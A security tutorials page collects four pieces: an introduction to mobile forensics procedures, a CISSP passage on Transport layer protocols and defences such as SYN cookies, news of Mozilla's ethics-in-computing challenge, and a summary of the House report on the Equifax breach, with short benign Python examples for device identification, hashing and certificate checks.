
How-To Tutorials - Security

174 Articles

Introduction to Mobile Forensics

Packt
10 Jul 2014
18 min read
(For more resources related to this topic, see here.)

In 2013, there were almost as many mobile cellular subscriptions as there were people on earth, says the International Telecommunication Union (ITU). The following figure shows global mobile cellular subscriptions from 2005 to 2013. Mobile cellular subscriptions are growing at lightning speed and passed a whopping 7 billion early in 2014. Portio Research Ltd. predicts that mobile subscribers will reach 7.5 billion by the end of 2014 and 8.5 billion by the end of 2016.

Mobile cellular subscription growth from 2005 to 2013

Smartphones of today, such as the Apple iPhone, Samsung Galaxy series, and BlackBerry phones, are compact forms of computers with high performance, huge storage, and enhanced functionality. Mobile phones are the most personal electronic devices users access. They are used to perform simple communication tasks, such as calling and texting, while also providing support for Internet browsing, e-mail, taking photos and videos, creating and storing documents, identifying locations with GPS services, and managing business tasks. As new features and applications are incorporated into mobile phones, the amount of information stored on the devices is continuously growing. Mobile phones have become portable data carriers, and they keep track of all your moves. With the increasing prevalence of mobile phones in people's daily lives and in crime, data acquired from phones has become an invaluable source of evidence for investigations relating to criminal, civil, and even high-profile cases. It is rare to conduct a digital forensic investigation that does not include a phone. Mobile device call logs and GPS data were used to help solve the attempted bombing in Times Square, New York, in 2010. The details of the case can be found at http://www.forensicon.com/forensics-blotter/cell-phone-email-forensics-investigation-cracks-nyc-times-square-car-bombing-case/.

The science behind recovering digital evidence from mobile phones is called mobile forensics. Digital evidence is defined as information and data that is stored on, received, or transmitted by an electronic device and that is used for investigations. Digital evidence encompasses any and all digital data that can be used as evidence in a case.

Mobile forensics

Digital forensics is a branch of forensic science focusing on the recovery and investigation of raw data residing in electronic or digital devices. Mobile forensics is the branch of digital forensics related to the recovery of digital evidence from mobile devices. Forensically sound is a term used extensively in the digital forensics community to qualify and justify the use of a particular forensic technology or methodology. The main principle for a sound forensic examination of digital evidence is that the original evidence must not be modified. This is extremely difficult with mobile devices. Some forensic tools require a communication vector with the mobile device, so standard write protection will not work during forensic acquisition. Other forensic acquisition methods may involve removing a chip or installing a bootloader on the mobile device prior to extracting data for forensic examination. In cases where the examination or data acquisition is not possible without changing the configuration of the device, the procedure and the changes must be tested, validated, and documented. Following proper methodology and guidelines is crucial in examining mobile devices, as it yields the most valuable data.
As with any evidence gathering, not following the proper procedure during the examination can result in the loss or damage of evidence or render it inadmissible in court. The mobile forensics process is broken into three main categories: seizure, acquisition, and examination/analysis.

Forensic examiners face some challenges while seizing the mobile device as a source of evidence. At the crime scene, if the mobile device is found switched off, the examiner should place the device in a faraday bag to prevent changes should the device automatically power on. Faraday bags are specifically designed to isolate the phone from the network. If the phone is found switched on, switching it off has a lot of concerns attached to it. If the phone is locked by a PIN or password or is encrypted, the examiner will be required to bypass the lock or determine the PIN to access the device. Mobile phones are networked devices and can send and receive data through different sources, such as telecommunication systems, Wi-Fi access points, and Bluetooth. So if the phone is in a running state, a criminal can securely erase the data stored on the phone by executing a remote wipe command. When a phone is switched on, it should be placed in a faraday bag. If possible, prior to placing the mobile device in the faraday bag, disconnect it from the network to protect the evidence by enabling flight mode and disabling all network connections (Wi-Fi, GPS, hotspots, and so on). This will also preserve the battery, which drains faster while the device is in a faraday bag searching for a signal, and protect against leaks in the faraday bag.

Once the mobile device is seized properly, the examiner may need several forensic tools to acquire and analyze the data stored on the phone. Mobile device forensic acquisition can be performed using multiple methods, which are defined later. Each of these methods affects the amount of analysis required. Should one method fail, another must be attempted. Multiple attempts and tools may be necessary in order to acquire the most data from the mobile device.

Mobile phones are dynamic systems that present many challenges to the examiner in extracting and analyzing digital evidence. The rapid increase in the number of different kinds of mobile phones from different manufacturers makes it difficult to develop a single process or tool to examine all types of devices. Mobile phones are continuously evolving as existing technologies progress and new technologies are introduced. Furthermore, each mobile is designed with a variety of embedded operating systems. Hence, special knowledge and skills are required from forensic experts to acquire and analyze the devices.

Mobile forensic challenges

One of the biggest forensic challenges when it comes to the mobile platform is the fact that data can be accessed, stored, and synchronized across multiple devices. As the data is volatile and can be quickly transformed or deleted remotely, more effort is required to preserve it. Mobile forensics is different from computer forensics and presents unique challenges to forensic examiners. Law enforcement and forensic examiners often struggle to obtain digital evidence from mobile devices. The following are some of the reasons:

Hardware differences: The market is flooded with different models of mobile phones from different manufacturers. Forensic examiners may come across many mobile models, which differ in size, hardware, features, and operating system.
Also, with a short product development cycle, new models emerge very frequently. As the mobile landscape changes with each passing day, it is critical for the examiner to adapt to all the challenges and remain updated on mobile device forensic techniques.

Mobile operating systems: Unlike personal computers, where Windows has dominated the market for years, mobile devices use a much wider variety of operating systems, including Apple's iOS, Google's Android, RIM's BlackBerry OS, Microsoft's Windows Mobile, HP's webOS, Nokia's Symbian OS, and many others.

Mobile platform security features: Modern mobile platforms contain built-in security features to protect user data and privacy. These features act as a hurdle during forensic acquisition and examination. For example, modern mobile devices come with default encryption mechanisms from the hardware layer to the software layer. The examiner might need to break through these encryption mechanisms to extract data from the devices.

Lack of resources: As mentioned earlier, with the growing number of mobile phones, the tools required by a forensic examiner also increase. Forensic acquisition accessories, such as USB cables, batteries, and chargers for different mobile phones, have to be maintained in order to acquire those devices.

Generic state of the device: Even if a device appears to be in an off state, background processes may still run. For example, on most mobiles, the alarm clock still works even when the phone is switched off. A sudden transition from one state to another may result in the loss or modification of data.

Anti-forensic techniques: Anti-forensic techniques, such as data hiding, data obfuscation, data forgery, and secure wiping, make investigations of digital media more difficult.

Dynamic nature of evidence: Digital evidence may be easily altered either intentionally or unintentionally. For example, browsing an application on the phone might alter the data stored by that application on the device.

Accidental reset: Mobile phones provide features to reset everything. Resetting the device accidentally while examining it may result in the loss of data.

Device alteration: The possible ways to alter devices range from moving application data and renaming files to modifying the manufacturer's operating system. In this case, the expertise of the suspect should be taken into account.

Passcode recovery: If the device is protected with a passcode, the forensic examiner needs to gain access to the device without damaging the data on it.

Communication shielding: Mobile devices communicate over cellular networks, Wi-Fi networks, Bluetooth, and infrared. As device communication might alter the device data, the possibility of further communication should be eliminated after seizing the device.

Lack of availability of tools: There is a wide range of mobile devices. A single tool may not support all the devices or perform all the necessary functions, so a combination of tools needs to be used. Choosing the right tool for a particular phone might be difficult.

Malicious programs: The device might contain malicious software or malware, such as a virus or a Trojan. Such malicious programs may attempt to spread to other devices over either a wired or a wireless interface.

Legal issues: Mobile devices might be involved in crimes that cross geographical boundaries. In order to tackle these multijurisdictional issues, the forensic examiner should be aware of the nature of the crime and the regional laws.
Mobile phone evidence extraction process

Evidence extraction and forensic examination of each mobile device may differ. However, following a consistent examination process will help the forensic examiner ensure that the evidence extracted from each phone is well documented and that the results are repeatable and defensible. There is no well-established standard process for mobile forensics. However, the following figure provides an overview of process considerations for the extraction of evidence from mobile devices. All methods used when extracting data from mobile devices should be tested, validated, and well documented. A great resource for handling and processing mobile devices can be found at http://digital-forensics.sans.org/media/mobile-device-forensic-process-v3.pdf.

Mobile phone evidence extraction process

The evidence intake phase

The evidence intake phase is the starting phase. It entails request forms and paperwork to document ownership information and the type of incident the mobile device was involved in, and it outlines the type of data or information the requester is seeking. Developing specific objectives for each examination is the critical part of this phase, as it serves to clarify the examiner's goals.

The identification phase

The forensic examiner should identify the following details for every examination of a mobile device:

The legal authority
The goals of the examination
The make, model, and identifying information for the device
Removable and external data storage
Other sources of potential evidence

We will discuss each of them in the following sections.

The legal authority

It is important for the forensic examiner to determine and document what legal authority exists for the acquisition and examination of the device, as well as any limitations placed on the media prior to the examination of the device.

The goals of the examination

The examiner identifies how in-depth the examination needs to be based on the data requested. The goal of the examination makes a significant difference in selecting the tools and techniques to examine the phone and increases the efficiency of the examination process.

The make, model, and identifying information for the device

As part of the examination, identifying the make and model of the phone assists in determining which tools will work with the phone.
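As a concrete illustration of this identification step (my own sketch, not part of the original article), the following Python snippet pulls identifying properties from an Android device using the standard adb command-line tool. It assumes adb is installed, the device is connected with USB debugging authorized, and, as with any handling of original evidence, that the interaction is documented, since even read-only queries count as handling the device.

```python
import subprocess

# System properties that identify the make, model, and OS build of an
# Android device. Example values in comments are hypothetical.
PROPS = [
    "ro.product.manufacturer",   # make, e.g. "samsung"
    "ro.product.model",          # model, e.g. "SM-G900F"
    "ro.build.version.release",  # Android OS version
    "ro.serialno",               # hardware serial number
]

def getprop(name: str) -> str:
    """Read a single system property over adb."""
    out = subprocess.run(
        ["adb", "shell", "getprop", name],
        capture_output=True, text=True, check=True,
    )
    return out.stdout.strip()

if __name__ == "__main__":
    for prop in PROPS:
        print(f"{prop} = {getprop(prop)}")
```

In a real examination, this output would go straight into the contemporaneous notes described later in the article.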
Removable and external data storage

Many mobile phones provide an option to extend the memory with removable storage devices, such as the TransFlash Micro SD memory expansion card. In cases where such a card is found in a mobile phone that is submitted for examination, the card should be removed and processed using traditional digital forensic techniques. It is also wise to acquire the card while it is in the mobile device to ensure that the data stored on both the handset memory and the card is linked for easier analysis.

Other sources of potential evidence

Mobile phones act as good sources of fingerprint and other biological evidence. Such evidence should be collected prior to the examination of the mobile phone to avoid contamination issues, unless the collection method will damage the device. Examiners should wear gloves when handling the evidence.

The preparation phase

Once the mobile phone model is identified, the preparation phase involves research regarding the particular mobile phone to be examined and the appropriate methods and tools to be used for acquisition and examination.

The isolation phase

Mobile phones are by design intended to communicate via cellular networks, Bluetooth, infrared, and wireless (Wi-Fi) networks. When the phone is connected to a network, new data is added to the phone through incoming calls, messages, and application data, which modifies the evidence on the phone. Complete destruction of data is also possible through remote access or remote wiping commands. For this reason, isolating the device from communication sources is important prior to the acquisition and examination of the device. Isolation of the phone can be accomplished through the use of faraday bags, which block radio signals to or from the phone. However, past research has found inconsistencies in the total communication protection offered by faraday bags. Therefore, additional network isolation is advisable. This can be done by placing the phone in radio frequency shielding cloth and then putting the phone into airplane or flight mode.

The processing phase

Once the phone has been isolated from the communication networks, the actual processing of the mobile phone begins. The phone should be acquired using a tested method that is repeatable and is as forensically sound as possible. Physical acquisition is the preferred method, as it extracts the raw memory data, and the device is commonly powered off during the acquisition process. On most devices, the fewest changes occur to the device during physical acquisition. If physical acquisition is not possible or fails, an attempt should be made to acquire the file system of the mobile device. A logical acquisition should always be obtained as well; although it may contain only the parsed data, it can provide pointers for examining the raw memory image.

The verification phase

After processing the phone, the examiner needs to verify the accuracy of the data extracted from the phone to ensure that the data has not been modified. The verification of the extracted data can be accomplished in several ways.

Comparing extracted data to the handset data: Check whether the data extracted from the device matches the data displayed by the device. The data extracted can be compared to the device itself or a logical report, whichever is preferred. Remember, handling the original device may make changes to the only evidence: the device itself.

Using multiple tools and comparing the results: To ensure accuracy, use multiple tools to extract the data and compare the results.

Using hash values: All image files should be hashed after acquisition to ensure the data remains unchanged. If file system extraction is supported, the examiner extracts the file system and then computes hashes for the extracted files. Later, any individually extracted file hash is calculated and checked against the original value to verify its integrity. Any discrepancy in a hash value must be explainable (for example, the device was powered on and then acquired again, and thus the hash values are different).
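To make the hashing step concrete, here is a minimal sketch of the general technique (an illustration of my own, not any specific forensic tool), which computes a SHA-256 digest of an acquired image using Python's standard hashlib and re-checks it later. The file name is hypothetical.

```python
import hashlib

def sha256_of(path: str, chunk_size: int = 1 << 20) -> str:
    """Compute the SHA-256 digest of a file, reading in chunks so that
    large forensic images do not have to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()

# Record the hash immediately after acquisition.
acquired_hash = sha256_of("phone_image.dd")
print("Acquisition hash:", acquired_hash)

# Later, before analysis or presentation, recompute and compare.
if sha256_of("phone_image.dd") != acquired_hash:
    raise ValueError("Image hash mismatch: evidence may have been altered")
```

Any mismatch at the second step is exactly the kind of discrepancy the article says must be explainable.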
The document and reporting phase

The forensic examiner is required to document the examination process throughout, in the form of contemporaneous notes relating to what was done during the acquisition and examination. Once the examiner completes the investigation, the results must go through some form of peer review to ensure that the data is checked and the investigation is complete. The examiner's notes and documentation may include information such as the following:

Examination start date and time
The physical condition of the phone
Photos of the phone and individual components
Phone status when received (turned on or off)
Phone make and model
Tools used for the acquisition
Tools used for the examination
Data found during the examination
Notes from peer review

The presentation phase

Throughout the investigation, it is important to make sure that the information extracted and documented from a mobile device can be clearly presented to any other examiner or to a court. Creating a forensic report of the data extracted from the mobile device during acquisition and analysis is important. This may include data in both paper and electronic formats. Your findings must be documented and presented in a manner such that the evidence speaks for itself in court. The findings should be clear, concise, and repeatable. Timeline and link analysis, features offered by many commercial mobile forensics tools, will aid in reporting and explaining findings across multiple mobile devices. These tools allow the examiner to tie together the communications of multiple devices.

The archiving phase

Preserving the data extracted from the mobile phone is an important part of the overall process. It is also important that the data is retained in a usable format for the ongoing court process, for future reference should the current evidence file become corrupt, and for record-keeping requirements. Court cases may continue for many years before the final judgment is arrived at, and most jurisdictions require that data be retained for long periods for the purposes of appeals. As the field and methods advance, new techniques for pulling data out of a raw, physical image may surface, and the examiner can then revisit the data by pulling a copy from the archives.

Practical mobile forensic approaches

Similar to any forensic investigation, several approaches can be used for the acquisition and examination/analysis of data from mobile phones. The type of mobile device, the operating system, and the security settings generally dictate the procedure to be followed in a forensic process. Every investigation is distinct, with its own circumstances, so it is not possible to design a single definitive procedural approach for all cases. The following details outline the general approaches followed in extracting data from mobile devices.

Mobile operating systems overview

One of the major factors in the data acquisition and examination/analysis of a mobile phone is the operating system. From low-end mobile phones to smartphones, mobile operating systems have come a long way with a lot of features. The mobile operating system directly affects how the examiner can access the device. For example, Android OS gives terminal-level access, whereas iOS does not give such an option. A comprehensive understanding of the mobile platform helps the forensic examiner make sound forensic decisions and conduct a conclusive investigation. While there is a large range of smart mobile devices, four main operating systems dominate the market, namely, Google Android, Apple iOS, RIM BlackBerry OS, and Windows Phone. More information can be found at http://www.idc.com/getdoc.jsp?containerId=prUS23946013.

Android

Android is a Linux-based operating system, and it's Google's open source platform for mobile phones. Android is the world's most widely used smartphone operating system.
Sources show that Apple's iOS is a close second (http://www.forbes.com/sites/tonybradley/2013/11/15/android-dominates-market-share-but-apple-makes-all-the-money/). Android has been developed by Google as an open and free option for hardware manufacturers and phone carriers. This makes Android the software of choice for companies that require a low-cost, customizable, lightweight operating system for their smart devices without developing a new OS from scratch. Android's open nature has further encouraged developers to build a large number of applications and upload them to Android Market. End users can then download those applications from Android Market, which makes Android a powerful operating system.

iOS

iOS, formerly known as the iPhone operating system, is a mobile operating system developed and distributed solely by Apple Inc. iOS is evolving into a universal operating system for all Apple mobile devices, such as the iPad, iPod touch, and iPhone. iOS is derived from OS X, with which it shares the Darwin foundation, and is therefore a Unix-like operating system. iOS manages the device hardware and provides the technologies required to implement native applications. iOS also ships with various system applications, such as Mail and Safari, which provide standard system services to the user. iOS native applications are distributed through the App Store, which is closely monitored by Apple.

Windows Phone

Windows Phone is a proprietary mobile operating system developed by Microsoft for smartphones and pocket PCs. It is the successor to Windows Mobile and is primarily aimed at the consumer market rather than the enterprise market. The Windows Phone OS is similar to the Windows desktop OS, but it is optimized for devices with a small amount of storage.

BlackBerry OS

BlackBerry OS is a proprietary mobile operating system developed by BlackBerry Ltd., formerly known as Research In Motion (RIM), exclusively for its BlackBerry line of smartphones and mobile devices. BlackBerry mobiles are widely used in corporations and offer native support for corporate mail via MIDP, which enables wireless synchronization with Microsoft Exchange e-mail, contacts, calendar, and so on, when used along with BlackBerry Enterprise Server. These devices are known for their security.


Communication and Network Security

Packt
21 Jun 2016
7 min read
In this article by M. L. Srinivasan, the author of the book CISSP in 21 Days, Second Edition, the communication and network security domain deals with the security of voice and data communications through local area, wide area, and remote access networking. Candidates are expected to have knowledge in the areas of secure communications; securing networks; threats, vulnerabilities, attacks, and countermeasures to communication networks; and protocols that are used in remote access.

(For more resources related to this topic, see here.)

Observe the following diagram. It represents the seven layers of the OSI model. This article covers protocols and security in the fourth layer, which is the Transport layer.

Transport layer protocols and security

The Transport layer does two things. One is to pack the data given out by applications into a format that is suitable for transport over the network, and the other is to unpack the data received from the network into a format suitable for applications. In this layer, some of the important protocols are Transmission Control Protocol (TCP), User Datagram Protocol (UDP), Stream Control Transmission Protocol (SCTP), Datagram Congestion Control Protocol (DCCP), and Fibre Channel Protocol (FCP). The process of packaging the data packets received from the applications is called encapsulation, and the output of such a process is called a datagram. Similarly, the process of unpacking the datagram received from the network is called decapsulation. Moving down from the seventh layer, when the fourth layer's header is placed on the data, it becomes a datagram. When the datagram is encapsulated with the third layer's header, it becomes a packet; the encapsulated packet becomes a frame at the second layer; and the frame is put on the wire as bits.
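As a rough illustration of encapsulation (a sketch of the concept of my own, not production networking code; real stacks do this inside the kernel), the following Python snippet prepends a simplified UDP-style Transport layer header to an application payload and strips it off again:

```python
import struct

def encapsulate(payload: bytes, src_port: int, dst_port: int) -> bytes:
    """Prepend a UDP-style header (source port, destination port, length,
    checksum) to the application payload, producing a datagram. The
    checksum is left as zero here for simplicity."""
    length = 8 + len(payload)  # 8-byte header plus data
    header = struct.pack("!HHHH", src_port, dst_port, length, 0)
    return header + payload

def decapsulate(datagram: bytes) -> bytes:
    """Strip the 8-byte header and hand the payload back to the application."""
    src, dst, length, checksum = struct.unpack("!HHHH", datagram[:8])
    return datagram[8:length]

datagram = encapsulate(b"GET / HTTP/1.1\r\n", src_port=49152, dst_port=80)
assert decapsulate(datagram) == b"GET / HTTP/1.1\r\n"
```

Each lower layer repeats the same pattern with its own header, which is exactly the datagram-to-packet-to-frame progression described above.

The following sections describe some of the important protocols in this layer along with security concerns and countermeasures.

Transmission Control Protocol (TCP)

TCP is a core Internet protocol that provides reliable delivery mechanisms over the Internet. TCP is a connection-oriented protocol. A protocol that guarantees the delivery of datagrams (packets) to the destination application by way of a suitable mechanism (for example, the three-way handshake of SYN, SYN-ACK, and ACK in TCP) is called a connection-oriented protocol. The reliability of datagram delivery in such a protocol is high due to the acknowledgment by the receiver. This protocol has two functions: the primary function of TCP is the transmission of datagrams between applications, and the secondary one covers the controls that are necessary for ensuring reliable transmissions. Applications where delivery needs to be assured, such as e-mail, the World Wide Web (WWW), file transfer, and so on, use TCP for transmission.

Threats, vulnerabilities, attacks, and countermeasures

One of the common threats to TCP is service disruption. A common vulnerability is half-open connections exhausting server resources. Denial-of-Service attacks such as TCP SYN attacks, as well as connection hijacking such as IP spoofing attacks, are possible. A half-open connection is a vulnerability in the TCP implementation. TCP uses a three-way handshake to establish or terminate connections. Refer to the following diagram.

In a three-way handshake, the client (workstation) first sends a request to the server (for example, www.SomeWebsite.com). This is called a SYN request.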
The server acknowledges the request by sending a SYN-ACK, and in the process, it creates a buffer for this connection. The client does a final acknowledgment with an ACK. TCP requires this setup because the protocol needs to ensure the reliability of the packet delivery. If the client does not send the final ACK, the connection is called half open. Since the server has created a buffer for that connection, a certain amount of memory or server resources is consumed. If thousands of such half-open connections are created maliciously, the server resources may be completely consumed, resulting in a Denial-of-Service to legitimate requests.

TCP SYN attacks work by establishing thousands of half-open connections to consume the server resources. There are two actions that an attacker might take. One is that the attacker or malicious software will send thousands of SYNs to the server and withhold the ACKs. This is called SYN flooding. Depending on the capacity of the network bandwidth and the server resources, over a span of time all the resources will be consumed, resulting in a Denial-of-Service. If the source IP is blocked by some means, the attacker or the malicious software will try to spoof the source IP addresses to continue the attack. This is called SYN spoofing.

SYN attacks such as SYN flooding and SYN spoofing can be controlled using SYN cookies with cryptographic hash functions. In this method, the server does not create the connection at the SYN-ACK stage. Instead, the server creates a cookie from the computed hash of the source IP address, source port, destination IP, destination port, and some random values based on the algorithm, and sends it in the SYN-ACK. When the server receives the ACK, it checks the details and only then creates the connection. A cookie is a piece of information, usually in the form of a text file, sent by the server to a client. Cookies are generally stored on a browser's disk or on client computers, and they are used for purposes such as authentication, session tracking, and management.
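To make the SYN cookie idea concrete, here is a deliberately simplified sketch (my own illustration; real TCP stacks also encode details such as the MSS in the cookie). The server derives the cookie from the connection 4-tuple, a coarse time counter, and a secret, so a returning ACK can be validated without any per-connection state having been stored:

```python
import hashlib
import hmac
import os
import time

SECRET = os.urandom(16)  # server-side secret; rotated periodically in practice

def make_cookie(src_ip, src_port, dst_ip, dst_port, counter=None) -> int:
    """Derive a 32-bit SYN cookie from the connection 4-tuple, a slowly
    ticking counter, and the server secret. The cookie is sent as the
    initial sequence number in the SYN-ACK, so no buffer is allocated."""
    if counter is None:
        counter = int(time.time()) // 64  # ticks roughly once a minute
    msg = f"{src_ip}:{src_port}>{dst_ip}:{dst_port}|{counter}".encode()
    digest = hmac.new(SECRET, msg, hashlib.sha256).digest()
    return int.from_bytes(digest[:4], "big")

def check_cookie(cookie, src_ip, src_port, dst_ip, dst_port) -> bool:
    """On receiving the final ACK, recompute the cookie (allowing the
    counter to have ticked once) and only then create the connection."""
    now = int(time.time()) // 64
    return any(
        hmac.compare_digest(
            cookie.to_bytes(4, "big"),
            make_cookie(src_ip, src_port, dst_ip, dst_port, c).to_bytes(4, "big"),
        )
        for c in (now, now - 1)
    )

# Hypothetical addresses for illustration.
c = make_cookie("198.51.100.7", 52344, "203.0.113.5", 443)
assert check_cookie(c, "198.51.100.7", 52344, "203.0.113.5", 443)
```

Because a forged ACK from a spoofed address cannot present a valid cookie, flooded SYNs cost the server no memory at all.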
User Datagram Protocol (UDP)

UDP is a connectionless protocol and is similar to TCP. However, UDP does not provide a delivery guarantee for data packets. A protocol that does not guarantee the delivery of datagrams (packets) to the destination is called a connectionless protocol. In other words, the final acknowledgment is not mandatory in UDP. UDP uses one-way communication. The delivery speed of datagrams in UDP is high. UDP is predominantly used where the loss of intermittent packets is acceptable, such as in video or audio streaming.

Threats, vulnerabilities, attacks, and countermeasures

Service disruptions are common threats, and validation weaknesses facilitate such threats. UDP flood attacks cause service disruptions, and controlling UDP packet size acts as a countermeasure to such attacks.

Internet Control Message Protocol (ICMP)

ICMP is used to discover service availability in network devices, servers, and so on. ICMP expects response messages from devices or systems to confirm service availability.

Threats, vulnerabilities, attacks, and countermeasures

Service disruptions are common threats, and validation weaknesses facilitate them. ICMP attacks, such as ICMP floods and the ping of death, cause service disruptions, and controlling ICMP packet size acts as a countermeasure to such attacks. Pinging is the process of sending an Internet Control Message Protocol (ICMP) ECHO_REQUEST message to servers or hosts to check whether they are up and running. In this process, the server or host on the network responds to a ping request, and such a response is called an echo. A ping of death refers to sending malformed or oversized ICMP packets to a server to crash the system.

Other protocols in the Transport layer

Stream Control Transmission Protocol (SCTP): This is a connection-oriented protocol similar to TCP, but it provides facilities such as multi-streaming and multi-homing for better performance and redundancy. It is used in UNIX-like operating systems.

Datagram Congestion Control Protocol (DCCP): As the name implies, this is a Transport layer protocol that is used for congestion control. Applications here include Internet telephony and video/audio streaming over the network.

Fibre Channel Protocol (FCP): This protocol is used in high-speed networking. One of its prominent applications is the Storage Area Network (SAN). A Storage Area Network (SAN) is a network architecture used to attach remote storage devices, such as tape drives and disk arrays, to the local server. This allows storage devices to be used as if they were local devices.

Summary

This article covered protocols and security in the Transport layer, which is the fourth layer.

Resources for Article:

Further resources on this subject:

The GNS3 orchestra [article]
CISSP: Vulnerability and Penetration Testing for Access Control [article]
CISSP: Security Measures for Access Control [article]


Mozilla announces $3.5 million award for ‘Responsible Computer Science Challenge’ to encourage teaching ethical coding to CS graduates

Melisha Dsouza
11 Oct 2018
3 min read
Mozilla, along with Omidyar Network, Schmidt Futures, and Craig Newmark Philanthropies, has launched an initiative for professors, graduate students, and teaching assistants at U.S. colleges and universities to integrate ethics into undergraduate computer science education and demonstrate its relevance. The competition, titled the 'Responsible Computer Science Challenge', has been launched to foster the idea of 'ethical coding' in today's times.

Code written by computer scientists is widely used in fields ranging from data collection to analysis. Poorly designed code can have a negative impact on a user's privacy and security. This challenge seeks creative approaches to integrating ethics and societal considerations into undergraduate computer science education. Ideas pitched by contestants will be judged by an independent panel of experts from academia, for-profit and non-profit organizations, and tech companies. The best proposals will be awarded up to $3.5 million over the next two years.

"We are looking to encourage ways of teaching ethics that make sense in a computer science program, that make sense today, and that make sense in understanding questions of data."
-Mitchell Baker, founder and chairwoman of the Mozilla Foundation

What is this challenge all about?

Professors are encouraged to tweak class material, for example, by integrating a reading assignment on ethics to go with each project, or by having computer science lessons co-taught with teaching assistants from the ethics department. The coursework introduced should encourage students to use their logical skills and come up with ideas to incorporate humanistic principles.

The challenge consists of two stages: a Concept Development and Pilot Stage and a Spread and Scale Stage. The first stage will award proposals up to $150,000 to try out their ideas firsthand, for instance at the university where the educator teaches. The second stage will select the best of the pilots and grant them $200,000 to help them scale to other universities. Baker asserts that the competition and its prize money will yield substantial and relevant practical ideas. Ideas will be judged on the potential of their approach, the feasibility of success, their difference from existing solutions, their impact on society, their ability to bring new perspectives to ethics, and the scalability of the solution.

Mozilla's competition comes as a welcome venture after many top universities, like Harvard and MIT, have taken initiatives to integrate ethics within their computer science departments. To know all about the competition, head over to Mozilla's official blog. You can also check out the entire coverage of this story at Fast Company.

Mozilla drops "meritocracy" from its revised governance statement and leadership structure to actively promote diversity and inclusion
Mozilla optimizes calls between JavaScript and WebAssembly in Firefox, making it almost as fast as JS to JS calls
Mozilla's new Firefox DNS security updates spark privacy hue and cry


Equifax data breach could have been “entirely preventable”, says House oversight and government reform committee staff report

Savia Lobo
11 Dec 2018
5 min read
Update: On July 22, 2019, Equifax announced a global settlement including up to $425 million to help people affected by the data breach.

Two days back, the House Oversight and Government Reform Committee released a staff report on Equifax's data breach, which affected 143 million U.S. consumers on September 7, 2017, and which could have been "entirely preventable". On September 14, 2017, the Committee opened an investigation into the Equifax data breach. After the 14-month-long investigation, the staff report highlights the circumstances of the cyber attack, which compromised authenticating details, such as dates of birth and social security numbers, of more than half of American consumers.

In August 2017, three weeks before Equifax publicly announced the breach, Richard Smith, the former CEO of Equifax, boasted that the company was managing "almost 1,200 times" the amount of data held in the Library of Congress every day. However, Equifax failed to implement an adequate security program to protect this sensitive data. As a result, Equifax allowed one of the largest data breaches in U.S. history.

The loopholes that led to a massive data breach

Equifax had serious gaps between IT policy development and execution

According to the Committee, Equifax failed to implement clear lines of authority within its internal IT management structure. This led to an execution gap between IT policy development and operation, which restricted the company's ability to implement security initiatives in a comprehensive and timely manner.

On March 7, 2017, a critical vulnerability in the Apache Struts software was publicly disclosed. Equifax used Apache Struts to run certain applications on legacy operating systems. The following day, the Department of Homeland Security alerted Equifax to this critical vulnerability. Equifax's Global Threat and Vulnerability Management (GTVM) team emailed the alert to over 400 people on March 9, instructing anyone who had Apache Struts running on their system to apply the necessary patch within 48 hours. The Equifax GTVM team also held a meeting on March 16 about this vulnerability. Equifax, however, did not fully patch its systems. Equifax's Automated Consumer Interview System (ACIS), a custom-built internet-facing consumer dispute portal developed in the 1970s, was running a version of Apache Struts containing the vulnerability. Equifax did not patch the Apache Struts software located within ACIS, leaving its systems and data exposed.

Equifax had complex and outdated IT systems

Equifax's aggressive growth strategy led to the acquisition of multiple companies, information technology (IT) systems, and data. The acquisition strategy may have been successful for the company's bottom line and stock price, but this growth also brought increasing complexity to Equifax's IT systems and expanded its data security risk. Both the complexity and the antiquated nature of Equifax's custom-built legacy systems made IT security especially challenging.

The company failed to implement responsible security measures

Per the Committee, Equifax knew of the potential security risks posed by expired SSL certificates. An internal vulnerability assessment tracker entry dated January 20, 2017, stated "SSLV devices are missing certificates, limiting visibility to web-based attacks on [intrusion prevention system]". Despite this, the company had allowed over 300 security certificates to expire, including 79 certificates for monitoring business-critical domains. Had Equifax implemented a certificate management process with defined roles and responsibilities, the SSL certificate on the device monitoring the ACIS platform would have been active when the intrusion began on May 13, 2017. The company would have been able to see the suspicious traffic to and from the ACIS platform much earlier, potentially mitigating or preventing the data breach.
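As an illustration of the kind of routine check that could have flagged the expired certificates (a sketch of my own, not Equifax's actual tooling), the following Python snippet fetches a server's TLS certificate and reports how many days remain before it expires. The domain is a placeholder standing in for a list of business-critical hosts.

```python
import socket
import ssl
from datetime import datetime, timezone

def days_until_expiry(host: str, port: int = 443) -> int:
    """Fetch the server certificate and return the number of days left
    before its notAfter date."""
    ctx = ssl.create_default_context()
    with socket.create_connection((host, port), timeout=10) as sock:
        with ctx.wrap_socket(sock, server_hostname=host) as tls:
            cert = tls.getpeercert()
    # notAfter looks like 'Jun  1 12:00:00 2025 GMT'
    not_after = datetime.strptime(cert["notAfter"], "%b %d %H:%M:%S %Y %Z")
    delta = not_after.replace(tzinfo=timezone.utc) - datetime.now(timezone.utc)
    return delta.days

# Hypothetical watch list of business-critical domains.
for host in ["example.com"]:
    days = days_until_expiry(host)
    status = "OK" if days > 30 else "RENEW NOW"
    print(f"{host}: certificate expires in {days} days [{status}]")
```

Run on a schedule against a maintained inventory, a check like this turns certificate expiry from a silent failure into an actionable alert.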
On August 30, 2018, the GAO (U.S. Government Accountability Office) published a report detailing Equifax's information security remediation activities to date. According to the GAO, "a misconfigured monitoring device allowed encrypted web traffic to go uninspected through the Equifax network. To prevent this from happening again, GAO reported Equifax developed new policies and implemented new tools to ensure network traffic is monitored continuously."

In its 2018 Annual Proxy Statement to investors, Equifax reported on how its Board of Directors was enhancing Board oversight in an effort to strengthen Equifax's cybersecurity posture. Equifax's new CEO, Mark Begor, told news outlets, "We didn't have the right defenses in place, but we are investing in the business to protect this from ever happening again." To know more about this news in detail, read the complete Equifax data breach report.

Affected users can now file a claim

On July 24, 2019, Equifax announced a settlement of up to $425 million to help people affected by its data breach. This global settlement was made with the Federal Trade Commission, the Consumer Financial Protection Bureau, and 50 U.S. states and territories. Users whose personal information was exposed in the Equifax data breach can now file a claim on the Equifax breach settlement website. Those who are unsure whether their data was exposed can find out using the eligibility tool. To know about the benefits a user would receive from this claim, read the FTC's official blog post.

A new data breach on Facebook due to malicious browser extensions allowed almost 81,000 users' private data up for sale, reports BBC News
Uber fined by British ICO and Dutch DPA nearly $1.2m over a data breach from 2016
Marriott's Starwood guest database faces a massive data breach affecting 500 million user data


